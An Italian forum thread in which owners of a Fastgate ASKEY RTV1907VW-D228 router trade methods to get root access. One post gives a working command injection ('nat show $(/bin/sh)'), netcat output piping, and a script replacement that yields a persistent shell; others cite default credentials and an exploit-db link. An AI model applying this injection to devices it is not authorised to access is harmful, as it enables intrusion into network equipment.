ASKEY RTV1907VW-D228

  • 228 Risposte
  • 83878 Visite

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline Utente14

  • Nuovo Iscritto
  • *
  • 13
Re:ASKEY RTV1907VW-D228
« Risposta #195 il: 03 Maggio 2020, 22:14 »
Buonasera a tutti. Una mia amica avrebbe bisogno di accedere periodicamente da remoto (quindi non all'interno di una stessa rete locale) a un PC collegato a Internet tramite questo modem, accendendo ogni volta il computer da uno stato di spegnimento. Qualcuno sa dirmi se una volta sbloccato il modem con seriale (seguendo la guida sopra riportata) sia possibile abilitare una funzione Wake-on-Wan? Grazie.
« Ultima modifica: 03 Maggio 2020, 22:28 da Utente14 »

Offline pako96

  • Nuovo Iscritto
  • *
  • 16
Re:ASKEY RTV1907VW-D228
« Risposta #196 il: 29 Agosto 2020, 02:35 »
Salve,
novità per lo sblocco di questo modem? Mio cugino ha questo Fastgate prodotto da Askey sul groppone e vorrebbe personalizzarlo per poterne estendere le funzionalità. Qualcosa di simile all'unlock dell'altra versione (dga413qfwb) esiste o no? Se si quale procedura funziona attualmente?
Versione 0.00.81 FW 200 ASKEY 2018-10-02 18:00
Versione software 1.0.1b
Versione hardware GATE01

GRAZIE!

Offline S0nico

  • Nuovo Iscritto
  • *
  • 13
Re:ASKEY RTV1907VW-D228
« Risposta #197 il: 10 Ottobre 2020, 17:42 »
Ciao Ragazzi, il mio rtv1907vw non mi fa accedere via seriale
non appare proprio nulla, premetto che il modulo usb funziona perchè lo uso con altro
quindi ho fatto la seguente
ho collegato il fastgate tramite la porta wan (etherne4) al mio pc sul quale ho avviato un server dhcp
ho fatto assegnare al fastgate l'ip 10.1.120.2 (che fa parte della subnet autorizzata per l'accesso ssh)
riesco ad accedere con lanadmin - lanpasswd
ma non ho una shel, solo un'interfaccia ristretta, quindi non posso avviare sh me fare su

qualcuno conosce la password di root ? o di qualche altro utente con il quale posso provare ?
di seguito ciò che mi appare al login (allego immagine)

Grazie a tutti

« Ultima modifica: 10 Ottobre 2020, 17:46 da S0nico »

Offline serniko97

  • Nuovo Iscritto
  • *
  • 4
Re:ASKEY RTV1907VW-D228
« Risposta #198 il: 16 Ottobre 2020, 18:34 »
Ciao, anche io sono tra quelli che non riesce a sbloccare il FASTGate.
Da seriale purtroppo non si apre nessuna shell e nemmeno la procedura di pagina 4 per flashare un vecchio firmware funziona.

@8nano non mi è molto chiaro come hai fatto il boot con la previous, in quale momento bisogna premere quale tasto? L'unica cosa che salta fuori è *** Press any key to stop auto run (1 seconds) *** dove premendo qualsiasi tasto mi chiede una password sconosciuta.

@S0nico vorrei provare anche io quello che hai detto, imposto il router con 10.1.120.2 tramite DHCP ed il mio PC lo imposto come 10.1.120.1 giusto? Va solo con Telnet o anche in SSH?

Grazie!
« Ultima modifica: 16 Ottobre 2020, 18:56 da serniko97 »

Offline S0nico

  • Nuovo Iscritto
  • *
  • 13
Re:ASKEY RTV1907VW-D228
« Risposta #199 il: 16 Ottobre 2020, 18:59 »
@serniko97  entrambi sia telnet che ssh, cmq da seriale a me non appare nulla, alcuna scritta e nemmeno io riesco con la procedura descritta a pagina 4 per caricare un nuovo firmware

Offline serniko97

  • Nuovo Iscritto
  • *
  • 4
Re:ASKEY RTV1907VW-D228
« Risposta #200 il: 16 Ottobre 2020, 20:04 »
Strano che non ti vada la seriale UART, io ho la stessa situazione di @Alex92 per capirci.

Hai collegato RX con TX e viceversa, vero? Il baud deve essere 115200 bit/s, niente bit di parità ed un solo bit di stop se non sbaglio.

Offline serniko97

  • Nuovo Iscritto
  • *
  • 4
Re:ASKEY RTV1907VW-D228
« Risposta #201 il: 17 Ottobre 2020, 11:55 »
@serniko97  entrambi sia telnet che ssh, cmq da seriale a me non appare nulla, alcuna scritta e nemmeno io riesco con la procedura descritta a pagina 4 per caricare un nuovo firmware

Ottimo, sono riuscito ad entrare col tuo trucco del DHCP ma purtroppo non sembra essere molto utile.

In questo articolo https://julians.design/2018/02/26/fastgate/ nella sezione commenti Yoko ha usato la stessa tecnica ed ha ottenuto il comando sh avviando con la previous ma non conosceva username e password...

Offline antiloplastico

  • Nuovo Iscritto
  • *
  • 8
Re:ASKEY RTV1907VW-D228
« Risposta #202 il: 31 Dicembre 2020, 21:44 »
Ragazzi, sono risucito a sbloccare tutto usando solo la porta WAN. Di seguito i punti:
1) Data la difficolta di far funzionare il server DHCP sul mio computer principale, ho optato per una Raspberry
2) Una volta configurato correttamente ho impostato il pool di indirizzi con 10.1.120.0/24
3) Entrato nel router, ho digitato "help" per avere la lista dei comandi possibili, ha attirato la mia attenzione il comando "nat" che permetteva anche di filtrare i risultati tramite una expression.... Penso che qualcuno potrà già intuire il l'exploit usato.
4) Digitando, quindi, "nat show $(/bin/sh)" si viene catapultati in una angusta shell Linux (pochissimi output).
5) Usando nc (netcat) si riesce a sopperire a quest'ultima mancanza e lavorarci un po' sopra; mi sono ispirato a SQL Injection via web (con le nuove versioni firmware via web non è più possibile), mi è bastato quindi dare il comando "nc -lvvp 8082" su un'altra shell di terminale sulla Raspberry e aggiungere la stringa " | nc 10.1.120.1 8082" per ogni comando nella shell del Fastgate quando volevo vedere l'output.
6) File system in read only, ho abilitato rw con questi comandi https://slides.poul.org/2018/workshop-interni/fastgate-hacking/#/37
7) Ho inserito una chiavetta nel router e copiato il file /usr/sbin/stshell/ntp.sh dentro quest'ultima, l'ho editato sosituendo tutta la parte coi vari "show=", fino ai due "echo" compresi, con un unico e imponente "/bin/sh -l".
8 ) Rimessa la chiavetta nel router e copiato il file modificato dalla chiavetta alla sua posizione iniziale (dopo aver fatto un backup del file originale)
9)Tolto la chiavetta dal router e rientrato tramite ssh. Mi è bastato dare "ntp show" per vedermi droppata una shell completamente funzionante!
versione immagine del router: 0.00.89

Spero di aver aiutato qualcuno, molte cose le ho fatte un po' a caso e non so quanto siano replicabili.
Prossima missione: sbloccare ssh nella LAN e installare la GUI Ansuel 8) 8)

Edit: SSH sbloccato grazie alla guida nelle slides linkate in alto (https://slides.poul.org/2018/workshop-interni/fastgate-hacking/#/40). SSH ora aperto anche per gli IP 192.168 nella LAN. Unico appunto, bisogna collegare il modem alla WAN (anche senza server DHCP attivo) all'accensione per avere la porta aperta (altrimenti non va).
Se qualcuno che ne sa di più riuscisse a editare le regole di iptables per avere la porta SSH aperta senza dover collegare il router alla WAN, sarebbe ottimo. Inoltre altre cose interessanti sarebbero:
- installare qualche applicativo essenziale (tipo nano),
- poter usare in linea di comando i binari in /statusapi/usr/bin senza dover scrivere il percorso completo ogni volta (ci sono vari programmi, come stat).

Edit2:
-per usare i binari in statusapi senza scrivere il percorso, ho dato il comando export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/statusapi/bin:/statusapi/sbin:/statusapi/usr/bin:/statusapi/usr/sbin
-purtroppo, a causa di una mia svista, il router è definitviamente (credo) briccato (anche in recovery la porta http rimane chiusa). Se qualcuno ha qualche consiglio per resuscitarlo, è ben accetto.
« Ultima modifica: 11 Gennaio 2021, 23:01 da antiloplastico »

Offline belgio96

  • Nuovo Iscritto
  • *
  • 3
Re:ASKEY RTV1907VW-D228
« Risposta #203 il: 11 Gennaio 2021, 21:49 »
ciao, non sono riuscito a fare il punto 5, ma sono arrivato, vedendo in chiaro, alla prima parte del punto 7 piu o meno.
non trovo una dir /usr/sbin/ se non come sotto cartella, e comunque non trovo il file ntp.sh nella dir "\lib\lxc\rootfs\usr..."
da qui non ho avuto pazienza di copiare un singolo file, ma tutto e lo allego se puo servire, noto che ci sono moltissimi sh e programmi linux in chiaro
ultima cosa, essendo un noob, come si vede, non so replicare e arrivare sempre a quella struct che ho copiato, se qualcuno lo sa me lo dica per cortesia
grazie e bel lavoro
qui i file: https://mega.nz/folder/KIkRjS7I#C3hrWcSB_ozNy4XmG1c-WQ

Offline antiloplastico

  • Nuovo Iscritto
  • *
  • 8
Re:ASKEY RTV1907VW-D228
« Risposta #204 il: 11 Gennaio 2021, 22:43 »
@belgio96 supponiamo tu voglia vedere l'output del comando "help" e che l'indirizzo del computer in cui è presente il server DHCP sia 10.120.1.1, dovrai:
1) Avere due finestre di terminale aperte A e B (su Linux il comando nc è preinstallato, su Windows no)
2) Nella finestra A fai l'accesso SSH al router ed entri nella shell root come spiegato
3) Nella finestra B dai il comando "nc -lvvp 8082", dovrebbe dirti di essere in ascolto.
4) Nella finestra A dai il comando "help | nc 10.120.1.1 8082"
5) Ora nella finestra B dovrebbero comparire delle scritte, cioè l'output del comando
6) Non sono sicuro della posizione dei file, comunque basta che nella finestra del router tu dia il comando "find / -name ntp.sh | nc 10.120.1.1 8082" e dovrebbe diriti il percorso.
P.S. Il firmware che hai caricato su Mega non è completo (mi era capitato anche a me ma non ricordo come ho risolto), comunque ho appena guarda sul firware che avevo dumpato e ti confermo che esiste /usr/sbin/stshell/ntp.sh. Altra cosa, ricordati di guardae che permessi ha ntp.sh prima di sostituirlo (puoi usare il comando "stat /usr/sbin/sshell/ntp.sh" dopo aver dato il comando export che ho scritto nel post precedente. È importante che l'utente, il gruppo e i permessi siano gli stessi dell'originale, altrimenti non so se funziona. In ogni caso per cambiare i permessi (supponendo che nell'originale sia 755) basta dare "chmod 755 /usr/sbin/stshell/ntp.sh".
« Ultima modifica: 11 Gennaio 2021, 22:51 da antiloplastico »

Offline tonyhouse

  • Nuovo Iscritto
  • *
  • 10
Re:ASKEY RTV1907VW-D228
« Risposta #205 il: 23 Gennaio 2021, 00:22 »
Ragazzi, sono risucito a sbloccare tutto usando solo la porta WAN. Di seguito i punti:
1) Data la difficolta di far funzionare il server DHCP sul mio computer principale, ho optato per una Raspberry
2) Una volta configurato correttamente ho impostato il pool di indirizzi con 10.1.120.0/24
3) Entrato nel router, ho digitato "help" per avere la lista dei comandi possibili, ha attirato la mia attenzione il comando "nat" che permetteva anche di filtrare i risultati tramite una expression.... Penso che qualcuno potrà già intuire il l'exploit usato.
Ciao!
io posseggo questo router e attualmente è il mio router principale (vorrei solamente poter modificare i dns usando quelli opendns, quindi una modifica abbastanza leggera...), ha il firmware 0.00.92_FW_200_Askey 2020-08-28 10:19:33
ho provato a lanciare un server dhcp (dhcpsrv per windows) e una volta configurato sul pool degli indirizzi con qualche difficoltà (per le prime 10 volte mi da Reject request because client asks for another address) ha assegnato l'ip al router, ma non funziona ne ssh ne telnet solo il ping (a volte perde i pacchetti)
hanno per caso messo delle ulteriori limitazioni (ip/mac address o altro?)
tu con che firmware sei riuscito ad entrare in ssh?
grazie mille anticipatamente
« Ultima modifica: 23 Gennaio 2021, 00:25 da tonyhouse »

Offline antiloplastico

  • Nuovo Iscritto
  • *
  • 8
Re:ASKEY RTV1907VW-D228
« Risposta #206 il: 23 Gennaio 2021, 08:41 »
Il firmware, come ho scritto sul mio post principale era il 0.00.89. Per quando riguarda dhcpsrv per Windows, io non sono riuscito a farlo partire, prova ad usare una macchina Linux se ce l'hai e usare isc-dhcp-server (mi pare si chiami così). Altrimenti prova ancora su dhcpsrv, se l'indirizzo è corretto, prova a staccare internet dal computer quando provi ad entrare nel router.
« Ultima modifica: 23 Gennaio 2021, 12:34 da MisterFTTH »

Offline tonyhouse

  • Nuovo Iscritto
  • *
  • 10
Re:ASKEY RTV1907VW-D228
« Risposta #207 il: 23 Gennaio 2021, 10:24 »
Ok grazie
Scusa ieri sera mi sono letto tutta la discussione e mi sono perso quando specificavi la versione
Ok provo con una live Linux allora
La cosa strana è che il Ping funziona ma ssh/telnet mi da connection refused...
Se non dovesse andare proverei la strada di questo exploit...
https://www.exploit-db.com/exploits/47654
Stay tuned
E grazie della pronta risposta!

Offline tonyhouse

  • Nuovo Iscritto
  • *
  • 10
Re:ASKEY RTV1907VW-D228
« Risposta #208 il: 23 Gennaio 2021, 22:53 »
niente, con il firmware 0.00.92 hanno fatto qualcosa in più dato che
1) riesco a fornire un indirizzo ip del tipo 10.1.120.x tramite porta wan
2) riesco a pingare utilizzando l'indirizzo ip fornito
MA non ho accesso ne ssh ne telnet
ho provato anche l'exploit https://www.exploit-db.com/exploits/47654 ma non funziona neppure quello...
se qualcuno ha una idea in più....

Offline antiloplastico

  • Nuovo Iscritto
  • *
  • 8
Re:ASKEY RTV1907VW-D228
« Risposta #209 il: 23 Gennaio 2021, 22:58 »
Prova a fare una scansione con nmap e vedi se le porte SSH e Telnet te le dà "filtrered"
« Ultima modifica: 23 Gennaio 2021, 23:00 da MisterFTTH »